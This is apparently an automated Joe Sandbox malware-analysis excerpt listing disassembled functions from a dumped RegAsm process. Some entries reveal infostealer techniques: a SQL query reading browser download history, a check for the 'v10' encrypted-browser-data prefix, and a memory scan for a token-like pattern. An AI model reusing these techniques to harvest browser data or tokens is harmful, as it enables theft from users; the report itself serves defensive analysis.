Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 22be46488e487139def84197e18f64df335d371bb25a63286c214dd0793a5f67
Instruction ID: 7bbf97c8efc78425d58068f332b69d476097f87aca75ccede965b5946e254080
Opcode Fuzzy Hash: 22be46488e487139def84197e18f64df335d371bb25a63286c214dd0793a5f67
Instruction Fuzzy Hash: 5901A271D54669EFCB039FA4CD89FBEBBB8FB04B14F450925E816E2690DB799801CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00408400 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 302stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000), ref: 004086F8
lstrlen.KERNEL32(00000000), ref: 0040870C

Strings

Downloads, xrefs: 00408444
SELECT target_path, tab_url from downloads, xrefs: 004085B7
Downloads, xrefs: 004084C8

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 9fe301e0c65639baad5394b31c11ebd942deb6a0fc9473ca69ca4494f92c0941
Instruction ID: 54a70b35f2e3bd0bead06bd516102e4005ef58b22266876870fc93898b796347
Opcode Fuzzy Hash: 9fe301e0c65639baad5394b31c11ebd942deb6a0fc9473ca69ca4494f92c0941
Instruction Fuzzy Hash: 8FC16F71805248EACB05EBA5D951BDDBBB86F19308F1441AEF506B3282DF785B0CC779

Uniqueness

Uniqueness Score: -1.00%

Function 0040F240 Relevance: 7.7, APIs: 5, Instructions: 165stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040F255
??_U@YAPAXI@Z.MSVCRT ref: 0040F282

Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F07D
Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F097
Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F152

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,00000000,00000000,00000000,?,0040FC51,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF,00000FFF), ref: 0040F2CE
VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040F3B4
??_V@YAXPAX@Z.MSVCRT ref: 0040F3C3

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$QueryVirtual
String ID:
API String ID: 3099930812-0
Opcode ID: 7c9b4c0b51c3ad2c2cdcaa8eef9269b8eebedcbf7ef5882b7756a5f9efe6eb19
Instruction ID: 067aa555f17516b8096591eac6b752a234b9d284ae0b983da437ecac591d64d5
Opcode Fuzzy Hash: 7c9b4c0b51c3ad2c2cdcaa8eef9269b8eebedcbf7ef5882b7756a5f9efe6eb19
Instruction Fuzzy Hash: 25519175A00118ABEB24DE69DD41ABFB3FAEB88714F14413AFD05E7380E638DD0187A5

Uniqueness

Uniqueness Score: -1.00%

Function 004070D0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040710B
memset.MSVCRT ref: 00407139
LocalAlloc.KERNEL32(00000040,?), ref: 00407170

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Strings

@, xrefs: 00407151
v10, xrefs: 00407105

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: a8a8207e43a13d49a5b41ba8a5176773fcd3b2b4e8d669f2682076d218f8a936
Instruction ID: 1ad0ea3c5568345b5ddcad74f610c07972afb0beca4ce7e104c85093a37f4707
Opcode Fuzzy Hash: a8a8207e43a13d49a5b41ba8a5176773fcd3b2b4e8d669f2682076d218f8a936
Instruction Fuzzy Hash: C941AD71E04219EBCB14DF94DC01BAEB7B8AB44B14F10426EF915B72C0DBB86905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B831 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041B83D

Part of subcall function 0041BA14: __getptd_noexit.LIBCMT ref: 0041BA17
Part of subcall function 0041BA14: __amsg_exit.LIBCMT ref: 0041BA24

__getptd.LIBCMT ref: 0041B854
__amsg_exit.LIBCMT ref: 0041B862
__lock.LIBCMT ref: 0041B872
__updatetlocinfoEx_nolock.LIBCMT ref: 0041B886

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 5c3cacb0f7ad1bba531c55489a9aabdf1faedfa9b12995f3489998ccd8b0754d
Instruction ID: 838ad8bec1577741fb6ee50676f92d0b4110c482cf9a1a1505d817c5540a6f99
Opcode Fuzzy Hash: 5c3cacb0f7ad1bba531c55489a9aabdf1faedfa9b12995f3489998ccd8b0754d
Instruction Fuzzy Hash: 8AF062319417109BDA10BB666803BCE6290EF00B68F10421FE450672D2CB3C49C1CADE

Uniqueness

Uniqueness Score: -1.00%

Function 19D673C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

fts5: syntax error near "%.*s", xrefs: 19D6751C

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: fts5: syntax error near "%.*s"
API String ID: 0-498961494
Opcode ID: 4fd9179e7fbc45b3994ab1be125311358e536826ed44fd4d6dae8ac62c25c628
Instruction ID: 43e036312c48a9d6ad2aed309a1cd1508bab23feab357439b153cecf47aa4e5a
Opcode Fuzzy Hash: 4fd9179e7fbc45b3994ab1be125311358e536826ed44fd4d6dae8ac62c25c628
Instruction Fuzzy Hash: BDB1F174904385DFD312CF68C884B5ABBE4BF84388F19481DF8C9876A0E775E585CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 19C813A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C81459
database corruption, xrefs: 19C81463
%s at line %d of [%.10s], xrefs: 19C81468

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 0ffe5f84a0fd0667d0948727410c1a5c8afbf7c80e4972aa9a7ce08359795511
Instruction ID: 2073993f10ee5b0027dda009453dfe8a431d7db6500d449ff6db70e1ac244d20
Opcode Fuzzy Hash: 0ffe5f84a0fd0667d0948727410c1a5c8afbf7c80e4972aa9a7ce08359795511
Instruction Fuzzy Hash: 8771F5B66043019FC705CF25D880A57BBE4BFC9358F1D8999E8C99B282D730E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C57D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap2, xrefs: 19C57E1F
winShmMap3, xrefs: 19C57F1D
winShmMap1, xrefs: 19C57DC5

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: 22ec354aa7430d7cc331956239ec7e73bc88b3676b56367b9847d2a737762931
Instruction ID: 5ae068f3d765c6db0292bf6c1e090cf5610a7a26e0fa3c7069620d562ae4556e
Opcode Fuzzy Hash: 22ec354aa7430d7cc331956239ec7e73bc88b3676b56367b9847d2a737762931
Instruction Fuzzy Hash: B161EEB26003419FE711DF65EC85A27B7E5AF84340F08896DE98797281EB30E854CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 19C83060 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 184COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C83092
database corruption, xrefs: 19C8309C
%s at line %d of [%.10s], xrefs: 19C830A1

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: d4ab7580e41d322ad90dfd0db8ce83c93b1f04af6a71b66e1abb3b5c3c32a6d8
Instruction ID: 79e4e2bde5c857607cda3a352c7a83530bde78dae3001a5eb803221a063610e1
Opcode Fuzzy Hash: d4ab7580e41d322ad90dfd0db8ce83c93b1f04af6a71b66e1abb3b5c3c32a6d8
Instruction Fuzzy Hash: 1561D0766083059FC704CF68C880AABBBE4BF88744F48591DF98987352E735E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C4DE5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

(join-%u), xrefs: 19C4DFA1
(subquery-%u), xrefs: 19C4DFB3

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: (join-%u)$(subquery-%u)
API String ID: 0-2916047017
Opcode ID: c1da3d029bd6c53807404affa816a86499862f5506991c594ba6293b01571fd1
Instruction ID: f372fadc3134bdb767866fa6da3dab85876fe381a8be46aa20b50bf0e81fb656
Opcode Fuzzy Hash: c1da3d029bd6c53807404affa816a86499862f5506991c594ba6293b01571fd1
Instruction Fuzzy Hash: 2551F675B043418BDB28EF24E891927B7E1BF85350F2D856DECDA4B646D631F801CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19C835E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C835EA
misuse, xrefs: 19C835F4
%s at line %d of [%.10s], xrefs: 19C835F9

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 503a967cf2034220a2afcf4a79de7e3065098122255b58006cb12fd5324adaae
Instruction ID: e68c9251e35542adda88353009ea2b27cbc70f958c5bf9ec2c5965f61afa9971
Opcode Fuzzy Hash: 503a967cf2034220a2afcf4a79de7e3065098122255b58006cb12fd5324adaae
Instruction Fuzzy Hash: 8C51F8F6A00311AFCB14CF18E884A56BBA4BF04728F0D916CF8995B2A1E731E810C791

Uniqueness

Uniqueness Score: -1.00%

Function 19DC5960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19DC5976
misuse, xrefs: 19DC5980
%s at line %d of [%.10s], xrefs: 19DC5985

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 6edda5984323adceed2ce9bdaefc0f2917c4f48fd9b08afc70a15940123c62c8
Instruction ID: 530b94021122ff8a2d6530250035871ca683c61e214a516d7559488bfa6cb85a
Opcode Fuzzy Hash: 6edda5984323adceed2ce9bdaefc0f2917c4f48fd9b08afc70a15940123c62c8
Instruction Fuzzy Hash: 2F4139769083419FD710CA16CC80B9AB7E4AF84320FCC152DFC84A7681E735F994C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19D1D2E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 119COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D1D2F7
database corruption, xrefs: 19D1D301
%s at line %d of [%.10s], xrefs: 19D1D306

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 613237ffe3fc3980de7033f92a9a94a01db4c2f0c8cd0d38c89bbb989c1467f2
Instruction ID: 0d22ec0502c70517bc45e5d4d3c9c4f82ce98a7a9ca20c71086f6177ffd34a86
Opcode Fuzzy Hash: 613237ffe3fc3980de7033f92a9a94a01db4c2f0c8cd0d38c89bbb989c1467f2
Instruction Fuzzy Hash: 6B3107B79043116FD711DA14EC00E9BBBE8EB84364F4C4839F945976A2E722F9418BA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C85390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C853FE
database corruption, xrefs: 19C85408
%s at line %d of [%.10s], xrefs: 19C8540D

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
